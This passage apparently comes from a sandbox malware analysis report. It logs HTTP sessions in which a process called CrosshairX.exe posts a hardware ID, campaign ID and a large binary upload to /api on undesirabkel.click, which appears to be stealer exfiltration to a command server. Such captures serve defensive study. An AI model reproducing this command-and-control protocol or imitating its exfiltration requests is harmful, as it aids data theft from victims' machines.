2025-01-05 19:00:02 UTC	15331	OUT	Data Raw: 2d 2d 47 4b 53 4e 31 57 58 41 4a 49 46 58 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 36 35 43 37 44 42 36 45 30 45 38 39 34 41 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 47 4b 53 4e 31 57 58 41 4a 49 46 58 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4b 53 4e 31 57 58 41 4a 49 46 58 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 6d 71 79 6c 78 78 68 6d 6e 66 66 0d 0a 2d 2d 47 Data Ascii: --GKSN1WXAJIFXQYContent-Disposition: form-data; name="hwid"E265C7DB6E0E894A29072D93766B97C1--GKSN1WXAJIFXQYContent-Disposition: form-data; name="pid"3--GKSN1WXAJIFXQYContent-Disposition: form-data; name="lid"LPnhqo--imqylxxhmnff--G
2025-01-05 19:00:02 UTC	5089	OUT	Data Raw: 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: M?lrQMn 64F6(X&7~`aO
2025-01-05 19:00:02 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jcabidatqgpfujee6ocjl589i2; expires=Thu, 01 May 2025 12:46:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B6NOvKPjhyDK9l5sefftDR0wfhLCdWUu3aeC8HygZm%2BfpOwzk8GcKLIhd5jMsAl%2FP0UPLxJYccmgNAsdtOLLmn4nmYBCBiR5VBD202FKdsB8DQwRRrasWFxP9na4V7n3KzPefsE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5b57a9973330c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2203&min_rtt=2203&rtt_var=827&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21380&delivery_rate=1322463&cwnd=190&unsent_bytes=0&cid=990a2af99050dc37&ts=643&x=0"
2025-01-05 19:00:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 19:00:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	188.114.96.3	443	7396	C:\Users\user\Desktop\CrosshairX.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:00:03 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1Y1TTNGEO4AYPGMR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 996 Host: undesirabkel.click
2025-01-05 19:00:03 UTC	996	OUT	Data Raw: 2d 2d 31 59 31 54 54 4e 47 45 4f 34 41 59 50 47 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 36 35 43 37 44 42 36 45 30 45 38 39 34 41 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 31 59 31 54 54 4e 47 45 4f 34 41 59 50 47 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 59 31 54 54 4e 47 45 4f 34 41 59 50 47 4d 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 6d 71 79 6c 78 78 68 6d 6e 66 Data Ascii: --1Y1TTNGEO4AYPGMRContent-Disposition: form-data; name="hwid"E265C7DB6E0E894A29072D93766B97C1--1Y1TTNGEO4AYPGMRContent-Disposition: form-data; name="pid"1--1Y1TTNGEO4AYPGMRContent-Disposition: form-data; name="lid"LPnhqo--imqylxxhmnf
2025-01-05 19:00:03 UTC	1136	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qe3a2hvvvj9pduldqk9d0g4bri; expires=Thu, 01 May 2025 12:46:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jmt6vbNaP4%2BJugr0oVXoXLT2KZIcFYcrzX1QBLUV1qcKVwtWmlMrA30vyeSRcdqGAiPhBAIVpQtd9dad%2B1Td%2BleeXs%2Bj8Vw%2F1L5rTsi%2BhZ%2FgvH4iaU4olDjJzE358ifdywb7hzk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5b5820be21a24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2041&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1912&delivery_rate=1423695&cwnd=224&unsent_bytes=0&cid=62d00b54935edb34&ts=482&x=0"
2025-01-05 19:00:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 19:00:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	188.114.96.3	443	7396	C:\Users\user\Desktop\CrosshairX.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:00:05 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=S9SIMVXLDN9Z4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570446 Host: undesirabkel.click
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: 2d 2d 53 39 53 49 4d 56 58 4c 44 4e 39 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 36 35 43 37 44 42 36 45 30 45 38 39 34 41 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 53 39 53 49 4d 56 58 4c 44 4e 39 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 39 53 49 4d 56 58 4c 44 4e 39 5a 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 6d 71 79 6c 78 78 68 6d 6e 66 66 0d 0a 2d 2d 53 39 53 49 Data Ascii: --S9SIMVXLDN9Z4Content-Disposition: form-data; name="hwid"E265C7DB6E0E894A29072D93766B97C1--S9SIMVXLDN9Z4Content-Disposition: form-data; name="pid"1--S9SIMVXLDN9Z4Content-Disposition: form-data; name="lid"LPnhqo--imqylxxhmnff--S9SI
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: 0f e0 77 55 ac 30 95 58 29 cd 58 02 48 7a 12 16 4c 79 1c f6 0a b0 cd 14 c0 ef c2 6b 7d 87 71 48 46 6f 2b bc c6 18 3a 2f 49 c3 ef 26 bb 88 80 33 ea 58 18 c7 c5 ae 59 a3 43 15 b7 af ee e7 ba 6d 07 a9 41 8e ff 6f 95 92 e6 03 74 fb 5d c1 1d 34 a8 27 93 7b 82 80 d7 16 0e 16 a0 29 38 a7 85 85 97 98 b1 7b d2 4a 05 20 de 9f 0b 46 a9 c7 18 bc 05 43 db 36 4b 88 71 48 aa 57 18 5c 4a 4c 73 70 c3 81 06 79 5e 80 31 3a 66 7b 86 43 09 24 a7 02 53 b7 f3 8b 34 69 7e 9b 9f 93 c3 1e 7e 31 62 8a 76 4a 79 39 72 a1 e8 11 e3 f8 57 8b 53 2a bc 69 ad 38 6a 85 a9 ac c6 10 2c d3 53 84 d8 00 de 8f a2 62 4c c1 05 0c 8b 92 b2 d5 e0 ef 22 cf a9 75 24 72 49 2b f2 55 fc 63 c6 e3 ab 76 12 54 32 23 1d 0b 4b 2c 6b ce bc 5b 02 7e 7b 68 da e8 40 41 f0 a3 1f cd de 3c 32 12 a8 12 bf 76 f3 68 1e Data Ascii: wU0X)XHzLyk}qHFo+:/I&3XYCmAot]4'{)8{J FC6KqHW\JLspy^1:f{C$S4i~~1bvJy9rWS*i8j,SbL"u$rI+UcvT2#K,k[~{h@A<2vh
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: 54 89 90 bc 65 65 24 8d 7d 1c 69 63 e6 f4 6a 3a a3 fd d7 1a 34 87 b0 bc 51 50 0a fb a2 de 2a b7 49 c0 91 9b 0a 63 f9 13 11 2d 14 89 60 2f 09 da a9 07 b8 8e 17 08 2a 52 66 18 ec 95 8a 2c 31 5d cb 7c 34 6c 2a 46 ab 8c 4f 3f ab 5c 97 0c 11 20 ee e9 7e 97 df 44 37 99 82 85 62 b4 54 1f e2 e5 0a 5f 68 cc 7e 28 14 19 db 3d 69 08 7c 90 e8 37 75 4a 11 88 09 2a b9 a6 14 a3 83 ee 19 0c 17 9a fd 62 34 3d d8 b1 4e 2f b1 d8 df 79 9e 29 89 0e 17 e4 ed ab a7 ff a5 ea fa 3d 8e c2 30 28 e3 cc cd 19 f9 ad be 39 66 c9 19 90 46 f8 9d af c8 cd 75 33 88 70 ad 1d a1 5a df 1f 20 ef e9 ba 1e 41 b9 72 86 eb f2 06 0f 8d be 9a 9f fa 2e 76 b9 f2 af a0 9f 2d 1a 9b f1 de 2e 90 8f 26 9c 79 82 8c b9 83 b9 fb 60 f1 52 4c 56 9e da 9d 78 36 a9 f5 20 f9 02 a3 61 e1 04 bb 51 37 4f 22 8c 99 5a Data Ascii: Tee$}icj:4QPIc-`/Rf,1]\|4lFO?\ ~D7bT_h~(=i\|7uJb4=N/y)=0(9fFu3pZ Ar.v-.&y`RLVx6 aQ7O"Z
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: f6 c9 41 84 b8 bb 77 80 ea 0b 5d 4e bf b7 0c 29 fa ea b7 27 25 b6 4b 5f ed a9 17 97 9e 5d 0d 03 b6 31 a8 39 b6 59 6b 5e 09 c0 50 7f df fd 78 e4 15 d3 a5 2f 38 03 75 a0 65 be 79 df a3 75 c2 d5 70 a5 d4 14 6f eb 60 94 ff ee da d4 5f 04 dd 14 41 f1 17 b1 03 be e0 8c cd 7f 45 93 a3 d7 3b ea 8c 72 96 26 9a ad b6 97 8a 3e 3a f1 92 a3 e5 77 97 d4 7c e2 9a ed 9c 0f bf 5e 78 ef bf 97 21 3b 2c 78 87 e2 f6 01 dd 8b fc fc 90 23 fd 80 f0 5f 2d 25 75 73 93 73 91 ea 1a ba 64 f7 f1 46 6f d4 92 c8 4d b4 c7 3d d7 24 a1 a4 06 3d 41 33 17 30 d6 a6 c6 54 ea f6 16 04 d7 96 60 e7 51 ea e6 71 19 3a 61 70 cb ef ce c9 cf dd 38 66 4f fb d1 92 b4 85 47 94 bd dd ed 1f e7 52 2b 7f 70 0c e2 2c 28 b2 57 9b ef f2 14 2f 9e a3 f9 95 b5 f6 93 3f ed 9e e1 e9 b7 fc a9 7a d0 ed d5 07 5b 35 8a Data Ascii: Aw]N)'%K_]19Yk^Px/8ueyupo`_AE;r&>:w\|^x!;,x#_-%ussdFoM=$=A30T`Qq:ap8fOGR+p,(W/?z[5
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: 13 36 d5 f7 e7 e2 e0 e6 41 1d e1 2e 5f ad d3 1c 1f 29 a3 f1 36 07 af 72 72 ce 82 d7 d0 c8 0b d5 a5 da e4 aa b2 24 74 ec 01 d5 11 0b 8e 4d f0 7e 67 17 79 b1 dd 3b 7b 5a 99 6e 0f b9 cd 9a 95 79 4f fe 1e 2b c9 80 57 05 6e 56 67 b8 e6 42 bc 65 44 2f c2 60 8e 0b fe 30 63 70 73 2f 42 08 18 4d e4 42 75 44 a0 f7 fa 0c 1f 71 70 5c cd 66 07 f2 3c 94 de 10 f5 bf 32 69 8b 0c 0a b8 ed 35 e9 54 74 1f 09 3e dc cb 6c e2 01 43 14 c7 51 6b 55 17 8c f0 ce bb f7 9f 0e bf d7 36 f5 d7 92 74 b8 7f 44 d2 e6 9e ca 7b 65 73 52 ba 1f fa ef 03 5a d3 c2 c9 84 15 88 e1 9f 48 e5 fb ff bf 92 1b 92 a0 74 8c 07 ce 03 8b 7f 06 2e c9 2c be 11 62 54 95 53 52 5a 90 c5 f0 e7 c5 92 47 45 3c 1c 84 f3 54 fb 27 ce 8e 70 c2 77 89 b2 ac 04 41 c4 9f ed e9 40 45 fb 19 92 58 6b 90 1a b8 15 a5 4d 3d f4 Data Ascii: 6A._)6rr$tM~gy;{ZnyO+WnVgBeD/`0cps/BMBuDqp\f<2i5Tt>lCQkU6tD{esRZHt.,bTSRZGE<T'pwA@EXkM=
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: c4 0a e1 06 41 4a 93 1b df cb 89 b3 9d 93 4b 6b 43 36 6e 15 f3 eb cc 22 e4 9c ea 24 84 9b ca 91 15 16 8d 9f 97 6b b0 d5 f2 85 2e f6 84 02 b9 67 51 85 a4 46 03 03 5f 81 1f 07 5b 02 a9 ea ca ad de da b5 09 50 bc f7 b6 cf b3 34 2d 64 60 c1 f6 ab 1d b5 22 d6 32 8c 00 c4 ae 5a 67 94 72 b8 3e c7 b6 8b 63 4a bf 10 06 04 dd 18 bb c7 d7 73 ff c8 dd ad 49 a7 7a c5 ee 22 67 8f b6 64 a1 12 95 68 43 31 fb f1 be cb 1f 8d 6c be e9 7b 16 08 1a 6a 34 85 6d f1 85 9d 6e e3 2b ce 37 9c 75 8c ed ad d8 7e f0 23 c8 f0 87 d0 39 67 d9 5f 75 89 cf a0 df 25 d8 dc ca 44 0c 01 3c 18 2a a0 b7 b6 0d ca db 72 7f b8 42 c2 d9 88 de 41 dc fa 2d 7a c1 51 9d c3 5b fa b8 43 1c 7f d4 c4 d6 51 7a 91 99 01 c9 b0 4a 92 11 bd 4f 4d 7d 56 4f 1e 13 02 fb fc a8 0e e9 9f 62 9e 07 f9 57 31 72 84 98 e3 Data Ascii: AJKkC6n"$k.gQF_[P4-d`"2Zgr>cJsIz"gdhC1l{j4mn+7u~#9g_u%D<*rBA-zQ[CQzJOM}VObW1r
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: 6c 24 f2 10 46 96 b7 59 d6 2e 64 7a fd 67 39 45 4e 94 bc ab eb 39 ab e4 ff 6b ab f8 89 93 45 c0 d7 3b 87 f3 e2 aa 3c de ec 6b 0b 8c d3 ed fb 86 c4 bb 73 df aa b2 86 25 9a 60 17 4e 95 20 23 05 41 1e 3a b0 ba 34 23 29 8d 13 84 dc 40 9d db 4c 41 ea 6e 36 6c a2 dc e1 56 d5 43 d1 1f 17 01 61 d5 3b 08 dc c2 c9 cc 66 4e 70 a0 4a fe b7 65 af 6c 7c f4 92 01 d7 ee 2c 0f c9 7a 99 fa d7 bf 3e 7e 84 fc b1 33 3e 1b 48 10 ef bd 81 5b c4 21 cb 6f 39 a6 b9 cf 95 c4 57 e3 15 ad 68 49 8c f5 9f 99 f8 c8 27 9b a1 29 88 e4 db 2c cc e6 b8 2d 69 28 a1 40 1b 09 37 1f b0 22 4d d0 59 b9 b3 5a fa 6d 3e 9a f5 33 4a f4 26 1a e0 36 57 7f a6 b1 7c 86 10 f4 6b a3 4b 8f 73 ee 05 32 d9 01 ce d5 3f ae 45 39 f4 82 c5 1a 21 70 75 63 b4 e4 63 8d f4 68 a5 52 df 66 25 4c 7d 0c 40 74 29 fd 1d 07 Data Ascii: l$FY.dzg9EN9kE;<ks%`N #A:4#)@LAn6lVCa;fNpJel\|,z>~3>H[!o9WhI'),-i(@7"MYZm>3J&6W\|kKs2?E9!pucchRf%L}@t)
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: 3b 48 82 ee 3b d4 9f 44 42 88 1c 62 de 89 7a 20 60 0e 5e 37 9c bf 16 0a 13 9e 87 e8 f3 27 2e 0e 55 38 8c e6 a5 13 44 34 19 0a e9 8a af c9 09 9e a6 b0 69 3d 5c 26 d5 45 e5 be 9b b6 b9 18 86 81 09 64 67 be 5f ed ff 6d 4f 6b d1 cb fc 91 b0 09 78 0e cc 3d 47 c1 b2 f3 67 c6 5f 60 61 3e 1c ef a2 34 b6 73 7c 62 ce 95 6d 3f 10 69 40 d4 46 99 89 f5 15 dd b0 af 75 51 4a 9f 1b 4f 31 bb a0 78 49 29 c3 60 4e bd cd 35 d6 be 86 28 1f aa 77 49 30 9e cc 0f 78 05 d6 63 ab 8e ba d6 77 9a 35 8d ef 0f 71 94 0a 40 62 56 f9 8a 7a e9 0f 3c fd 49 d8 eb fb 16 bd a1 64 64 77 6a 5c 4b 0d ef 89 68 a0 d9 7c 1a fc 56 be aa 5f e2 c9 79 51 f6 e0 f8 b0 44 bf d3 a6 f3 bf 88 27 94 c2 fd 53 f5 57 05 48 81 1e 31 8c 61 a3 fc 9e 92 80 6b 5e 4b 9b 5f 12 f1 a4 5a 53 b9 f4 9f d7 69 67 f5 86 9a 69 Data Ascii: ;H;DBbz `^7'.U8D4i=\&Edg_mOkx=Gg_`a>4s\|bm?i@FuQJO1xI)`N5(wI0xcw5q@bVz<Iddwj\Kh\|V_yQD'SWH1ak^K_ZSigi
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: bc 48 dc df 03 e8 83 99 08 2d 09 62 e6 cb 82 aa cb fb 01 fc 2f 2f 88 36 98 74 af cc 59 7b 99 d8 42 d6 c6 72 1d 50 df 35 79 04 b6 9b 39 cc 48 81 ab bb 4d e5 21 52 3c 1c 84 2c 13 ce b0 74 1f 4d 86 5f 93 79 31 76 41 12 4b 9c e2 eb f8 95 e0 b7 20 dc 4a 40 44 ba f9 79 cc 3f 50 e1 ce ed a9 50 ef 74 e8 58 82 2c b3 71 9d 26 82 df 25 0b bf 03 28 b7 a1 a4 d8 ad 83 cf 43 88 f8 1b 8c 8b c9 b6 b3 dd 45 c3 7a 6c 19 61 21 37 ee c1 6b a3 05 c2 51 2a 9d 80 3b 31 17 7e 94 00 6b 19 fe 9a 63 72 5e e9 b4 35 44 4b 88 0a 41 ca 1b 81 3a 54 61 82 08 9d b0 ef 52 fd 03 88 1f e2 e3 17 94 f8 56 73 e0 51 ac fc d3 4f e0 40 ef d7 a6 7c 94 59 43 b0 04 e7 0d 48 7f 12 ac 8a a0 05 bb c6 34 be 78 32 a8 ee 90 df 1e c0 37 9b 94 47 e6 e7 9b dd a2 47 85 09 0a 33 b5 97 85 f9 be 55 7f 96 67 68 f3 Data Ascii: H-b//6tY{BrP5y9HM!R<,tM_y1vAK J@Dy?PPtX,q&%(CEzla!7kQ*;1~kcr^5DKA:TaRVsQO@\|YCH4x27GG3Ugh
2025-01-05 19:00:05 UTC	15331	OUT	Data Raw: 4f ce 85 b6 ef 0b e0 1c 35 5b f1 42 6c 00 f6 d1 16 e9 fe ff 00 65 f6 b9 d6 a3 42 63 90 6e ce d8 d0 db ff 74 fb 38 6c 7c 17 d4 2d c8 e6 9f ab be 7f f8 96 04 61 bb 51 00 b7 17 22 f3 43 19 7b a2 87 62 f3 8d ec 50 30 1c 66 bb 7b 9b a5 3f 67 dd fa 19 5c 1f c2 cb 9d c2 b2 0b b2 8f ee 97 66 de 6a 50 b3 39 8d ac 6d 8c fb fe d2 37 c7 4b 01 ec c1 73 02 22 ab 16 63 a4 4e 3a f9 72 3f 34 bb 3a c8 d2 8a 26 2c f8 c9 e2 9c c7 5f cd 6f 03 fc 04 e2 af 11 62 10 2e 18 b7 f5 eb d9 a5 d1 24 11 8a 2f 64 ee 98 9f 81 90 79 58 2f ba 43 b0 29 4b eb 10 38 6c 9d 5e 5b 63 b4 1a 98 d6 84 36 2d c5 f0 d3 1b 79 28 e6 26 c5 dc f3 2c 6b 3d e9 d3 f5 34 5e 30 b9 81 9e b1 03 4d bf 84 35 16 28 af 93 6a 65 d3 15 eb 03 65 45 c6 74 de 28 27 86 7b 4b 31 9b 55 e6 bd 5d 11 df f4 5b 95 1e 8a e7 3c b8 Data Ascii: O5[BleBcnt8l\|-aQ"C{bP0f{?g\fjP9m7Ks"cN:r?4:&,_ob.$/dyX/C)K8l^[c6-y(&,k=4^0M5(jeeEt('{K1U][<
2025-01-05 19:00:07 UTC	1140	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lt2kgoc1k5higr0st3uffi7867; expires=Thu, 01 May 2025 12:46:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=is8RZr%2B70AYwPMZpWEk2hr%2FBQCMgszwTchU8wOlkFPaD68bKruGHhMB%2FCFWroA7NZ%2B4Oz1GplOAvlfREfIWJGDrLXmgiLJUngd9FemyXMk%2FDFfIcNOCQMAGRIxjOOWaDq%2FrPE3M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5b58bfc34f799-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1601&rtt_var=615&sent=218&recv=588&lost=0&retrans=0&sent_bytes=2845&recv_bytes=572990&delivery_rate=1759036&cwnd=92&unsent_bytes=0&cid=f9d84f10c81996e0&ts=2317&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	188.114.96.3	443	7396	C:\Users\user\Desktop\CrosshairX.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:00:07 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: undesirabkel.click
2025-01-05 19:00:07 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 6d 71 79 6c 78 78 68 6d 6e 66 66 26 6a 3d 26 68 77 69 64 3d 45 32 36 35 43 37 44 42 36 45 30 45 38 39 34 41 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--imqylxxhmnff&j=&hwid=E265C7DB6E0E894A29072D93766B97C1
2025-01-05 19:00:08 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bcub9r30fdji5k4r1v52hjf0fk; expires=Thu, 01 May 2025 12:46:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsY8kWhA7lGNPDu2Zr3Np%2FsuWRiLDJQEAQnbLzqY36EDKQykHH2Wa%2FR0CA%2BwEoASuT5sAu%2BPDPeKpoUg5QD7dLvqBgAEVcnggaK%2FbbKO8Kp7e1BPxZ7YvSXMoc%2BkJsxWjM%2B0l1g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5b59dcffdefa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=2135&rtt_var=1067&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4230&recv_bytes=991&delivery_rate=258452&cwnd=161&unsent_bytes=0&cid=561d298e4c35d2e3&ts=545&x=0"
2025-01-05 19:00:08 UTC	234	IN	Data Raw: 33 37 33 63 0d 0a 4a 59 33 2b 4b 52 36 41 77 48 74 4d 34 55 79 6a 47 35 43 45 72 6d 49 54 42 5a 4f 42 62 6f 2f 39 37 39 37 75 53 6c 65 4b 66 52 6c 2b 39 74 78 50 61 71 4c 36 53 6d 44 44 4b 59 45 68 6f 61 69 4d 42 6a 45 2f 73 63 38 6a 78 37 4b 6a 69 37 67 45 50 4e 35 4e 66 57 54 55 6b 6d 34 70 74 76 59 63 49 71 35 6e 6c 30 2f 2b 74 50 77 2b 50 46 6d 38 39 6a 7a 47 70 39 79 6b 6f 33 4d 56 32 68 78 39 58 62 69 54 48 6b 66 30 6b 6a 35 2b 73 78 7a 78 63 4e 4c 74 2b 77 42 6c 64 2b 4c 43 44 62 6a 4b 68 35 47 49 47 42 2f 57 55 6b 55 4b 7a 37 68 42 63 4f 61 4e 41 58 79 6b 64 64 4d 6f 31 4e 44 73 47 48 6f 30 31 64 55 30 79 73 53 6e 6a 36 6b 41 42 66 39 57 62 45 72 48 68 46 39 72 78 66 56 43 43 59 63 51 Data Ascii: 373cJY3+KR6AwHtM4UyjG5CErmITBZOBbo/9797uSleKfRl+9txPaqL6SmDDKYEhoaiMBjE/sc8jx7Kji7gEPN5NfWTUkm4ptvYcIq5nl0/+tPw+PFm89jzGp9yko3MV2hx9XbiTHkf0kj5+sxzxcNLt+wBld+LCDbjKh5GIGB/WUkUKz7hBcOaNAXykddMo1NDsGHo01dU0ysSnj6kABf9WbErHhF9rxfVCCYcQ
